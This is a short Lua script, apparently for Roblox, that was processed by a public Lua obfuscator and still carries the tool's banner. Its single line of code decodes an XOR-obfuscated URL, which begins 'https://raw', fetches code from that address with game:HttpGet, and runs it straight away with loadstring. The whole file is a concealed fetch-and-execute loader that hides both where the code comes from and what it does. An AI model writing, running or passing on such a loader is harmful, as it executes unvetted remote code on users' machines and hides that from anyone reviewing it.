--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.7) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=(1557 -539) -((412 -212) + 817), #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (1 -0))),v1(v2(v9,1 + (0 -0) + ((v11-(1 + 0))% #v9),1 + 0 + ((v11-(2 -(1 -0)))% #v9) + (2 -(1 + 0)))))%(112 + 144)));end return v5(v10);end loadstring(game:HttpGet(v7("\192\71\242\213\219\9\169\138\218\82\241\139\207\90\242\205\221\81\243\214\205\65\229\202\198\71\227\203\220\29\229\202\197\28\228\192\218\93\231\215\204\92\183\157\155\4\169\195\219\82\224\193\135\94\231\204\198\28\224\214\201\85\226","\168\51\134\165")))();
